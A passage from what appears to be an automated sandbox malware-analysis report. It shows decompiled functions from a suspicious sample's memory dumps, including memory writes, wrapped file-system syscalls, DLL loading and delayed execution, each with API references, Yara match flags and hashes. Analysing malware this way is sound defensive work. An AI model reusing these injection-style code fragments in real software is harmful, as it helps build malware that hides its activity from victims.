				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E10004C81(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x1000ed78; // 0xd11300
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x1000e950;
								if(__eflags != 0) {
									_push(_t33);
									E10003B54(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x1000ed78; // 0xd11300
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x1000ed78; // 0xd11300
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E10005980();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E100032D0(_t25, _t29, _t31, 0x20);
				}
				return E100046E5(_t33);
			}











                                                                                                                                    0x100058e5
                                                                                                                                    0x100058e5
                                                                                                                                    0x100058e5
                                                                                                                                    0x100058e5
                                                                                                                                    0x100058e7
                                                                                                                                    0x100058ec
                                                                                                                                    0x100058f6
                                                                                                                                    0x100058f8
                                                                                                                                    0x10005900
                                                                                                                                    0x10005921
                                                                                                                                    0x10005927
                                                                                                                                    0x1000592b
                                                                                                                                    0x1000592e
                                                                                                                                    0x10005931
                                                                                                                                    0x10005937
                                                                                                                                    0x10005939
                                                                                                                                    0x1000593b
                                                                                                                                    0x1000593e
                                                                                                                                    0x10005944
                                                                                                                                    0x10005946
                                                                                                                                    0x10005948
                                                                                                                                    0x1000594e
                                                                                                                                    0x10005950
                                                                                                                                    0x10005951
                                                                                                                                    0x10005956
                                                                                                                                    0x1000594e
                                                                                                                                    0x10005946
                                                                                                                                    0x10005957
                                                                                                                                    0x1000595c
                                                                                                                                    0x1000595f
                                                                                                                                    0x10005965
                                                                                                                                    0x10005969
                                                                                                                                    0x10005969
                                                                                                                                    0x1000596f
                                                                                                                                    0x10005976
                                                                                                                                    0x10005908
                                                                                                                                    0x10005908
                                                                                                                                    0x10005908
                                                                                                                                    0x1000590d
                                                                                                                                    0x10005911
                                                                                                                                    0x10005916
                                                                                                                                    0x1000591e

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1000382E: __getptd_noexit.LIBCMT ref: 1000382F
                                                                                                                                      • Part of subcall function 1000382E: __amsg_exit.LIBCMT ref: 1000383C
                                                                                                                                    • __amsg_exit.LIBCMT ref: 10005911
                                                                                                                                    • __lock.LIBCMT ref: 10005921
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1000593E
                                                                                                                                    • InterlockedIncrement.KERNEL32(00D11300), ref: 10005969
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2880340415-0
                                                                                                                                    • Opcode ID: 5d0b27642ffa0fbed2aa7f725354314db6a1b8bceaee117e5e29fcb043c81b78
                                                                                                                                    • Instruction ID: 524891ef8d020457d3b76694f6f572190f925b82a3b18031206f286628e8e04a
                                                                                                                                    • Opcode Fuzzy Hash: 5d0b27642ffa0fbed2aa7f725354314db6a1b8bceaee117e5e29fcb043c81b78
                                                                                                                                    • Instruction Fuzzy Hash: 9601573A901A26EBFA12DB65888575A73A0EF007E2F114105E840A729DDB25AE81DB96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Analysis Process: cmd.exe PID: 6360 Parent PID: 1748 cmd.exeCOMMON

                                                                                                                                    Executed Functions

                                                                                                                                    Function 0080318C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtWriteVirtualMemory.NTDLL(000000FF,?,?,00000005,00000000), ref: 00803293
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryVirtualWrite
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 3527976591-2766056989
                                                                                                                                    • Opcode ID: ec05abe7dd8f7549aed38738b05f861bb955aa6bf581d4ed681f38eedcf4e5e8
                                                                                                                                    • Instruction ID: f3f8ac87f0a0d27f770646172b5e354480d1b2f6ed116f6b2dd664eef8c24707
                                                                                                                                    • Opcode Fuzzy Hash: ec05abe7dd8f7549aed38738b05f861bb955aa6bf581d4ed681f38eedcf4e5e8
                                                                                                                                    • Instruction Fuzzy Hash: DD5181B5D04219EFCB04CF98C890AEEBBB5FF48314F148259E519AB390D731AA45CF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00418180, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00418180(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418D80(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x413b57
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                    0x0041818f
                                                                                                                                    0x00418197
                                                                                                                                    0x004181b9
                                                                                                                                    0x004181cd
                                                                                                                                    0x004181d1

                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408AC3,?,W;A,00408AC3,FFFFFFFF,?,?,FFFFFFFF,00408AC3,00413B57,?,00408AC3,00000060,00000000,00000000), ref: 004181CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID: W;A
                                                                                                                                    • API String ID: 823142352-2883288857
                                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                    • Instruction ID: fc8cfab2575da1a496486cdbdd5ccf7d074368776fda38d20555821bca86f3ae
                                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                    • Instruction Fuzzy Hash: 5CF0B2B2201208ABCB08DF89DC85EEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0041817A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E0041817A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t24;
				void* _t34;

				asm("repne mov [0x8bec8b55], eax");
				_t18 = _a4;
				_t4 = _t18 + 0xc40; // 0xc40
				E00418D80(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t12 =  &_a20; // 0x413b57
				_t24 = NtCreateFile(_a8, _a12, _a16,  *_t12, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t24;
			}





                                                                                                                                    0x0041817e
                                                                                                                                    0x00418183
                                                                                                                                    0x0041818f
                                                                                                                                    0x00418197
                                                                                                                                    0x004181b9
                                                                                                                                    0x004181cd
                                                                                                                                    0x004181d1

                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408AC3,?,W;A,00408AC3,FFFFFFFF,?,?,FFFFFFFF,00408AC3,00413B57,?,00408AC3,00000060,00000000,00000000), ref: 004181CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID: W;A
                                                                                                                                    • API String ID: 823142352-2883288857
                                                                                                                                    • Opcode ID: 57f079cf1c811204a856313ada3763fbe53f021354355927e75ac33420afc866
                                                                                                                                    • Instruction ID: edf9615d11550c62dac09330efbf65fe6f0aa41787d893f908cf62de3a80d3f7
                                                                                                                                    • Opcode Fuzzy Hash: 57f079cf1c811204a856313ada3763fbe53f021354355927e75ac33420afc866
                                                                                                                                    • Instruction Fuzzy Hash: B3F014B2250148AFCB08DF98D884CEB77A9FF8C314B05865DFA4D97202D630E851CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00409AF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00409AF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB10( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF30(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1B0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192C0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                    0x00409b0c
                                                                                                                                    0x00409b0f
                                                                                                                                    0x00409b14
                                                                                                                                    0x00409b19
                                                                                                                                    0x00409b23
                                                                                                                                    0x00409b28
                                                                                                                                    0x00409b2b
                                                                                                                                    0x00409b2d
                                                                                                                                    0x00409b35
                                                                                                                                    0x00409b3a
                                                                                                                                    0x00409b3a
                                                                                                                                    0x00409b41
                                                                                                                                    0x00409b49
                                                                                                                                    0x00409b4c
                                                                                                                                    0x00409b4e
                                                                                                                                    0x00409b62
                                                                                                                                    0x00000000
                                                                                                                                    0x00409b64
                                                                                                                                    0x00409b6a
                                                                                                                                    0x00409b1e
                                                                                                                                    0x00409b1e
                                                                                                                                    0x00409b1e

                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                    • Opcode ID: 2c78643bad6e30f4ea8c0f4a77ac75325507bca23f3a68eb4ab84608b245d78b
                                                                                                                                    • Instruction ID: 619c61b7a7d6d7575f6340fcea7d2f394fff4df01cefa4342c7902000db355f0
                                                                                                                                    • Opcode Fuzzy Hash: 2c78643bad6e30f4ea8c0f4a77ac75325507bca23f3a68eb4ab84608b245d78b
                                                                                                                                    • Instruction Fuzzy Hash: 640152B5E0020DB7DF10DAA1EC42FDEB378AB54308F0041A6E908A7281F634EB54CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 46b9ded759cb8de79452a0448c24265e16e098b954fd30fb95c975b509e83f1b
                                                                                                                                    • Instruction ID: 3bd1b5080eedd3d8a72bfee8979ae72f850d7c4fcee662e77cf3b29e2257680b
                                                                                                                                    • Opcode Fuzzy Hash: 46b9ded759cb8de79452a0448c24265e16e098b954fd30fb95c975b509e83f1b
                                                                                                                                    • Instruction Fuzzy Hash: CEF08CB5200208ABCB10EF89DC81EE777ADEF88354F00824AFA0D97241CA34E9518BE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00418230, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                    			E00418230(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418D80(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                                    0x00418233
                                                                                                                                    0x0041823f
                                                                                                                                    0x00418247
                                                                                                                                    0x00418275
                                                                                                                                    0x00418279

                                                                                                                                    APIs
                                                                                                                                    • NtReadFile.NTDLL(00413D12,5E972F59,FFFFFFFF,004139D1,?,?,00413D12,?,004139D1,FFFFFFFF,5E972F59,00413D12,?,00000000), ref: 00418275
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                    • Instruction ID: 34a3e3c40f91502aeb4d2aa89f59f326de5eb9f8ac5d275f0c8204906c50d898
                                                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                    • Instruction Fuzzy Hash: 32F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249FA1D97241DA30E8518BA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004182AC, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E004182AC(void* __edx, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t12;
				void* _t13;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_push(0x8b55c0dc);
				_t3 = _t5 + 0xc50; // 0x409713
				E00418D80(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t12 = _a8;
				_push(es);
				_t8 = NtClose(_t12); // executed
				return _t8;
			}






                                                                                                                                    0x004182b3
                                                                                                                                    0x004182b6
                                                                                                                                    0x004182b9
                                                                                                                                    0x004182bf
                                                                                                                                    0x004182c7
                                                                                                                                    0x004182cc
                                                                                                                                    0x004182d0
                                                                                                                                    0x004182d5
                                                                                                                                    0x004182d9

                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 96a80d62849bdea728495507afa2b5d7166605d9abc0bc37b01e9506cc559a65
                                                                                                                                    • Instruction ID: 4c55892d4bd7149a1d033ae8e5d69281e94fc72e3ea4e501d9bf363ef8c616e3
                                                                                                                                    • Opcode Fuzzy Hash: 96a80d62849bdea728495507afa2b5d7166605d9abc0bc37b01e9506cc559a65
                                                                                                                                    • Instruction Fuzzy Hash: 5CE0C23A640210AFD710EFD9CC84ED77B58EF48360F154499F90CDB281C530ED0086E0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004182B0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E004182B0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t10;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409713
				E00418D80(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = _a8;
				_push(es);
				_t8 = NtClose(_t10); // executed
				return _t8;
			}






                                                                                                                                    0x004182b3
                                                                                                                                    0x004182b6
                                                                                                                                    0x004182bf
                                                                                                                                    0x004182c7
                                                                                                                                    0x004182cc
                                                                                                                                    0x004182d0
                                                                                                                                    0x004182d5
                                                                                                                                    0x004182d9

                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                    • Instruction ID: 6b68d8a54e684a6abef8896f3696699f2b4952745b0db19f1cfc41b8081163df
                                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                    • Instruction Fuzzy Hash: 17D01776240318ABD710EF99DC85EE77BACEF48760F154499FA189B282C930FA0086E0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 008054E0, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtDelayExecution.NTDLL(00000000,00002710,?,?,00002710), ref: 0080550E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DelayExecution
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1249177460-0
                                                                                                                                    • Opcode ID: a864221d4e35edaff4d577c93af2c64f1fac2e3a0d8d2825f73315bdb9043f7a
                                                                                                                                    • Instruction ID: da82270076b5d17c5099b43b517ecda4cf54d141028b29b7c519af19f7ba3fdd
                                                                                                                                    • Opcode Fuzzy Hash: a864221d4e35edaff4d577c93af2c64f1fac2e3a0d8d2825f73315bdb9043f7a
                                                                                                                                    • Instruction Fuzzy Hash: 13E08675C0030CBBCB04EEA8DC0AA9DBB7CEF00311F408269FD589A1C0E73052548BA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 6d24611541562103527917afc490068ae26c0ccd15f8e820df3f5ea9796479cd
                                                                                                                                    • Instruction ID: bd4ce3816c5d99652c822445f99c16e290c4695e08968113b4233b535434ae69
                                                                                                                                    • Opcode Fuzzy Hash: 6d24611541562103527917afc490068ae26c0ccd15f8e820df3f5ea9796479cd
                                                                                                                                    • Instruction Fuzzy Hash: 2290027220100413F11171598504B07000DD7E0285F91C45BE041555CD9696D962F561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: f7a57b16e74cf6c774d3a0c7e040b762bcca6a7b090b79beef99c74d058f9b60
                                                                                                                                    • Instruction ID: a5db940979a1a76228c6b31296196b5b2f9ee4c85fffd88cc49aa0d07e69ce3b
                                                                                                                                    • Opcode Fuzzy Hash: f7a57b16e74cf6c774d3a0c7e040b762bcca6a7b090b79beef99c74d058f9b60
                                                                                                                                    • Instruction Fuzzy Hash: 6C900262242041527545B1598404907400AE7F0285791C05BE1405954C8566E866EA61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 3d93cad58116df84f9b1de2422b937c2b584b5ad407820088c604887588536ab
                                                                                                                                    • Instruction ID: cd24a8340fa097018747006cb1fce77ca9c1bb2ea32717bfd5c172935c4d9089
                                                                                                                                    • Opcode Fuzzy Hash: 3d93cad58116df84f9b1de2422b937c2b584b5ad407820088c604887588536ab
                                                                                                                                    • Instruction Fuzzy Hash: 869002A234100442F10071598414F060009D7F1345F51C05EE1055558D8659DC62B566
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 699bdbba79002116afc520c03ce8c583288e704cbf017a5df170c84549717dd7
                                                                                                                                    • Instruction ID: ad061dd2e0d35910d28d69f892369b998742475e7608439c1caf688537b25e64
                                                                                                                                    • Opcode Fuzzy Hash: 699bdbba79002116afc520c03ce8c583288e704cbf017a5df170c84549717dd7
                                                                                                                                    • Instruction Fuzzy Hash: 979002A220200003610571598414A16400ED7F0245B51C06AE1005594DC565D8A1B565
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: df68127870d41f3fc72b85346807ec1dc9a6de8922804ccdd21096e0b5a46060
                                                                                                                                    • Instruction ID: 06c49a2685b3612c4f97c414be4de5809c158a7de30b544f0fd5af691a338a64
                                                                                                                                    • Opcode Fuzzy Hash: df68127870d41f3fc72b85346807ec1dc9a6de8922804ccdd21096e0b5a46060
                                                                                                                                    • Instruction Fuzzy Hash: 629002B220100402F14071598404B460009D7E0345F51C05AE5055558E8699DDE5BAA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B79540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: e9dd46da3a98237732d12494cca41702f608ac019ccb387422e4db0ce59db785
                                                                                                                                    • Instruction ID: 13949c945b3d6db557ca2a40d0073df7f8c1db3e3149f6b7dfd304019b780f69
                                                                                                                                    • Opcode Fuzzy Hash: e9dd46da3a98237732d12494cca41702f608ac019ccb387422e4db0ce59db785
                                                                                                                                    • Instruction Fuzzy Hash: 08900266211000032105B5594704907004AD7E5395351C06AF1006554CD661D871A561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: ec9250c42a93bcbe92f3d053e7b142b964b2e2041d190abffb1f858b47f99d76
                                                                                                                                    • Instruction ID: 19667e0e2f1f99f21217b69e2263c752c452439c585b9b7162324096843d72a8
                                                                                                                                    • Opcode Fuzzy Hash: ec9250c42a93bcbe92f3d053e7b142b964b2e2041d190abffb1f858b47f99d76
